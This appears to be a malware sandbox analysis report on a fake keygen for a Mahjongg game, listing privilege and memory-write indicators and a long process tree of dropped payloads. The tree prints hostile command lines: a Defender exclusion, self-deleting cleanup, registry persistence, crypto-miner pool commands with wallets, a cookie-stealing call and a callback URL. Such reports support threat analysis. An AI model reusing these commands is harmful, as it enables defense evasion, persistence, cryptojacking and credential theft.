Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 2108 Setup.exe Token: SeCreateTokenPrivilege 1600 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1600 askinstall20.exe Token: SeLockMemoryPrivilege 1600 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1600 askinstall20.exe Token: SeMachineAccountPrivilege 1600 askinstall20.exe Token: SeTcbPrivilege 1600 askinstall20.exe Token: SeSecurityPrivilege 1600 askinstall20.exe Token: SeTakeOwnershipPrivilege 1600 askinstall20.exe Token: SeLoadDriverPrivilege 1600 askinstall20.exe Token: SeSystemProfilePrivilege 1600 askinstall20.exe Token: SeSystemtimePrivilege 1600 askinstall20.exe Token: SeProfSingleProcessPrivilege 1600 askinstall20.exe Token: SeIncBasePriorityPrivilege 1600 askinstall20.exe Token: SeCreatePagefilePrivilege 1600 askinstall20.exe Token: SeCreatePermanentPrivilege 1600 askinstall20.exe Token: SeBackupPrivilege 1600 askinstall20.exe Token: SeRestorePrivilege 1600 askinstall20.exe Token: SeShutdownPrivilege 1600 askinstall20.exe Token: SeDebugPrivilege 1600 askinstall20.exe Token: SeAuditPrivilege 1600 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1600 askinstall20.exe Token: SeChangeNotifyPrivilege 1600 askinstall20.exe Token: SeRemoteShutdownPrivilege 1600 askinstall20.exe Token: SeUndockPrivilege 1600 askinstall20.exe Token: SeSyncAgentPrivilege 1600 askinstall20.exe Token: SeEnableDelegationPrivilege 1600 askinstall20.exe Token: SeManageVolumePrivilege 1600 askinstall20.exe Token: SeImpersonatePrivilege 1600 askinstall20.exe Token: SeCreateGlobalPrivilege 1600 askinstall20.exe Token: 31 1600 askinstall20.exe Token: 32 1600 askinstall20.exe Token: 33 1600 askinstall20.exe Token: 34 1600 askinstall20.exe Token: 35 1600 askinstall20.exe Token: SeDebugPrivilege 4004 Conhost.exe Token: SeDebugPrivilege 4112 taskkill.exe Token: SeDebugPrivilege 3548 MicrosoftEdge.exe Token: SeDebugPrivilege 3548 MicrosoftEdge.exe Token: SeDebugPrivilege 3548 MicrosoftEdge.exe Token: SeDebugPrivilege 3548 MicrosoftEdge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2536 setups.exe 3172 setups.tmp 3548 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 3888 wrote to memory of 2500 3888 Kyodai_Mahjongg_2006_1_keygen.exe 79 PID 3888 wrote to memory of 2500 3888 Kyodai_Mahjongg_2006_1_keygen.exe 79 PID 3888 wrote to memory of 2500 3888 Kyodai_Mahjongg_2006_1_keygen.exe 79 PID 2500 wrote to memory of 3940 2500 cmd.exe 82 PID 2500 wrote to memory of 3940 2500 cmd.exe 82 PID 2500 wrote to memory of 3940 2500 cmd.exe 82 PID 2500 wrote to memory of 8 2500 cmd.exe 83 PID 2500 wrote to memory of 8 2500 cmd.exe 83 PID 2500 wrote to memory of 8 2500 cmd.exe 83 PID 2500 wrote to memory of 1120 2500 cmd.exe 84 PID 2500 wrote to memory of 1120 2500 cmd.exe 84 PID 2500 wrote to memory of 1120 2500 cmd.exe 84 PID 2500 wrote to memory of 2140 2500 cmd.exe 85 PID 2500 wrote to memory of 2140 2500 cmd.exe 85 PID 2500 wrote to memory of 2140 2500 cmd.exe 85 PID 3940 wrote to memory of 3812 3940 keygen-pr.exe 86 PID 3940 wrote to memory of 3812 3940 keygen-pr.exe 86 PID 3940 wrote to memory of 3812 3940 keygen-pr.exe 86 PID 2140 wrote to memory of 2108 2140 keygen-step-4.exe 87 PID 2140 wrote to memory of 2108 2140 keygen-step-4.exe 87 PID 1120 wrote to memory of 3816 1120 keygen-step-3.exe 88 PID 1120 wrote to memory of 3816 1120 keygen-step-3.exe 88 PID 1120 wrote to memory of 3816 1120 keygen-step-3.exe 88 PID 3812 wrote to memory of 2816 3812 key.exe 90 PID 3812 wrote to memory of 2816 3812 key.exe 90 PID 3812 wrote to memory of 2816 3812 key.exe 90 PID 3816 wrote to memory of 752 3816 cmd.exe 91 PID 3816 wrote to memory of 752 3816 cmd.exe 91 PID 3816 wrote to memory of 752 3816 cmd.exe 91 PID 2108 wrote to memory of 4004 2108 Setup.exe 170 PID 2108 wrote to memory of 4004 2108 Setup.exe 170 PID 2108 wrote to memory of 2536 2108 Setup.exe 93 PID 2108 wrote to memory of 2536 2108 Setup.exe 93 PID 2108 wrote to memory of 2536 2108 Setup.exe 93 PID 2140 wrote to memory of 1600 2140 keygen-step-4.exe 94 PID 2140 wrote to memory of 1600 2140 keygen-step-4.exe 94 PID 2140 wrote to memory of 1600 2140 keygen-step-4.exe 94 PID 2536 wrote to memory of 3172 2536 setups.exe 95 PID 2536 wrote to memory of 3172 2536 setups.exe 95 PID 2536 wrote to memory of 3172 2536 setups.exe 95 PID 1600 wrote to memory of 2532 1600 askinstall20.exe 97 PID 1600 wrote to memory of 2532 1600 askinstall20.exe 97 PID 1600 wrote to memory of 2532 1600 askinstall20.exe 97 PID 2532 wrote to memory of 4112 2532 cmd.exe 101 PID 2532 wrote to memory of 4112 2532 cmd.exe 101 PID 2532 wrote to memory of 4112 2532 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Kyodai_Mahjongg_2006_1_keygen.exe"C:\Users\Admin\AppData\Local\Temp\Kyodai_Mahjongg_2006_1_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:752
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\H06IPT5DJH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\H06IPT5DJH\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵PID:4004
-
C:\Users\Admin\AppData\Local\Temp\H06IPT5DJH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\H06IPT5DJH\multitimer.exe" 1 3.1617513328.60694b70d9f73 1016⤵PID:4576
-
C:\Users\Admin\AppData\Local\Temp\H06IPT5DJH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\H06IPT5DJH\multitimer.exe" 2 3.1617513328.60694b70d9f737⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\ail3z44xcss\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ail3z44xcss\cpyrix.exe" /VERYSILENT8⤵PID:5156
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:4392
-
C:\Users\Admin\AppData\Local\Temp\ceeda5ec-62e8-4fc5-857b-127c356b9188\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ceeda5ec-62e8-4fc5-857b-127c356b9188\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ceeda5ec-62e8-4fc5-857b-127c356b9188\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\ceeda5ec-62e8-4fc5-857b-127c356b9188\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ceeda5ec-62e8-4fc5-857b-127c356b9188\AdvancedRun.exe" /SpecialRun 4101d8 505611⤵PID:4124
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:5152
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:5616
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:6956
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:5396
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:6696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 192410⤵
- Program crash
PID:6700
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5804
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6672
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5668
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\f13w2yx0afd\vpn.exe"C:\Users\Admin\AppData\Local\Temp\f13w2yx0afd\vpn.exe" /silent /subid=4828⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\is-6O9FD.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-6O9FD.tmp\vpn.tmp" /SL5="$30270,15170975,270336,C:\Users\Admin\AppData\Local\Temp\f13w2yx0afd\vpn.exe" /silent /subid=4829⤵PID:5592
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5192
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5576
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:6988
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:6804
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:8544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2tjp0kjnfrp\app.exe"C:\Users\Admin\AppData\Local\Temp\2tjp0kjnfrp\app.exe" /8-238⤵PID:5436
-
-
C:\Users\Admin\AppData\Local\Temp\a5ithp534gi\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\a5ithp534gi\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5536
-
C:\Users\Admin\AppData\Local\Temp\is-URB5M.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-URB5M.tmp\IBInstaller_97039.tmp" /SL5="$5005C,14575144,721408,C:\Users\Admin\AppData\Local\Temp\a5ithp534gi\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5712
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-5VERG.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:6112
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-5VERG.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5364
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:8236
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:6712
-
-
C:\Users\Admin\AppData\Local\Temp\is-5VERG.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-5VERG.tmp\{app}\chrome_proxy.exe"10⤵PID:9832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mmqb4gbk5zi\uv0z3oh4xce.exe"C:\Users\Admin\AppData\Local\Temp\mmqb4gbk5zi\uv0z3oh4xce.exe" /quiet SILENT=1 AF=7568⤵PID:5652
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mmqb4gbk5zi\uv0z3oh4xce.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mmqb4gbk5zi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617254242 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\1wozjag2qf3\pvkkixewig0.exe"C:\Users\Admin\AppData\Local\Temp\1wozjag2qf3\pvkkixewig0.exe"8⤵PID:5336
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1wozjag2qf3\pvkkixewig0.exe"9⤵PID:4280
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jmn3hkdylqy\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\jmn3hkdylqy\Setup3310.exe" /Verysilent /subid=5778⤵PID:5196
-
-
C:\Users\Admin\AppData\Local\Temp\acct1ulg3t1\okrflsnls4d.exe"C:\Users\Admin\AppData\Local\Temp\acct1ulg3t1\okrflsnls4d.exe" /VERYSILENT8⤵PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\m5fmzrrfhqu\vict.exe"C:\Users\Admin\AppData\Local\Temp\m5fmzrrfhqu\vict.exe" /VERYSILENT /id=5358⤵PID:5148
-
-
C:\Users\Admin\AppData\Local\Temp\vhnapgn4xdr\5o052m2byii.exe"C:\Users\Admin\AppData\Local\Temp\vhnapgn4xdr\5o052m2byii.exe" /ustwo INSTALL8⤵PID:5140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5o052m2byii.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vhnapgn4xdr\5o052m2byii.exe" & exit9⤵PID:3956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5o052m2byii.exe" /f10⤵
- Kills process with taskkill
PID:5144
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WF6Y6P7198\setups.exe"C:\Users\Admin\AppData\Local\Temp\WF6Y6P7198\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Users\Admin\AppData\Local\Temp\is-87GDK.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-87GDK.tmp\setups.tmp" /SL5="$8003C,635399,250368,C:\Users\Admin\AppData\Local\Temp\WF6Y6P7198\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:4644
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4756
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4808
-
C:\Users\Admin\AppData\Roaming\AA20.tmp.exe"C:\Users\Admin\AppData\Roaming\AA20.tmp.exe"5⤵PID:4832
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:3896
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:812
-
-
-
C:\Users\Admin\AppData\Roaming\AC06.tmp.exe"C:\Users\Admin\AppData\Roaming\AC06.tmp.exe"5⤵PID:4988
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AC06.tmp.exe6⤵PID:11984
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6224
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:2412
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4132
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4272
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:10796
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3548
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2428
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4360
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\is-FL7QA.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-FL7QA.tmp\Setup3310.tmp" /SL5="$30312,138429,56832,C:\Users\Admin\AppData\Local\Temp\jmn3hkdylqy\Setup3310.exe" /Verysilent /subid=5771⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\is-ERKAH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ERKAH.tmp\Setup.exe" /Verysilent2⤵PID:5728
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:3620
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1268
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:5240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 9484⤵
- Program crash
PID:11732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 10284⤵
- Program crash
PID:3928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 10684⤵
- Program crash
PID:7936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 9364⤵
- Program crash
PID:7960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 11804⤵
- Program crash
PID:8332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 12444⤵
- Program crash
PID:11936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 15044⤵
- Program crash
PID:8996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 15924⤵
- Program crash
PID:8844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 16604⤵
- Program crash
PID:10176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 11964⤵
- Program crash
PID:11064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 16964⤵
- Program crash
PID:10328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 15564⤵
- Program crash
PID:11564
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:5548
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\is-O0889.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-O0889.tmp\LabPicV3.tmp" /SL5="$3027A,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:4180
-
C:\Users\Admin\AppData\Local\Temp\is-E51MB.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-E51MB.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:3680
-
C:\Program Files\Windows Security\PXGUTYXDVM\prolab.exe"C:\Program Files\Windows Security\PXGUTYXDVM\prolab.exe" /VERYSILENT6⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\is-082MU.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-082MU.tmp\prolab.tmp" /SL5="$3039A,575243,216576,C:\Program Files\Windows Security\PXGUTYXDVM\prolab.exe" /VERYSILENT7⤵PID:6432
-
-
-
C:\Users\Admin\AppData\Local\Temp\c5-29322-fb6-d20b3-ee6110ae5a324\Disigasuca.exe"C:\Users\Admin\AppData\Local\Temp\c5-29322-fb6-d20b3-ee6110ae5a324\Disigasuca.exe"6⤵PID:6148
-
-
C:\Users\Admin\AppData\Local\Temp\b8-0cc29-15a-dc18b-913cc7892da0e\Tedaenaetery.exe"C:\Users\Admin\AppData\Local\Temp\b8-0cc29-15a-dc18b-913cc7892da0e\Tedaenaetery.exe"6⤵PID:6216
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v02rkuft.0iq\md6_6ydj.exe & exit7⤵PID:10416
-
C:\Users\Admin\AppData\Local\Temp\v02rkuft.0iq\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\v02rkuft.0iq\md6_6ydj.exe8⤵PID:12048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kw0jermd.qsd\askinstall31.exe & exit7⤵PID:10784
-
C:\Users\Admin\AppData\Local\Temp\kw0jermd.qsd\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\kw0jermd.qsd\askinstall31.exe8⤵PID:11364
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:11924
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:7136
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yjs2ylx0.hf0\toolspab1.exe & exit7⤵PID:11420
-
C:\Users\Admin\AppData\Local\Temp\yjs2ylx0.hf0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\yjs2ylx0.hf0\toolspab1.exe8⤵PID:5992
-
C:\Users\Admin\AppData\Local\Temp\yjs2ylx0.hf0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\yjs2ylx0.hf0\toolspab1.exe9⤵PID:11464
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uaesjvnv.bia\GcleanerWW.exe /mixone & exit7⤵PID:11832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubjukqsy.fbx\setup_10.2_mix.exe & exit7⤵PID:11072
-
C:\Users\Admin\AppData\Local\Temp\ubjukqsy.fbx\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\ubjukqsy.fbx\setup_10.2_mix.exe8⤵PID:12016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0pfochce.ve5\file.exe & exit7⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\0pfochce.ve5\file.exeC:\Users\Admin\AppData\Local\Temp\0pfochce.ve5\file.exe8⤵PID:8216
-
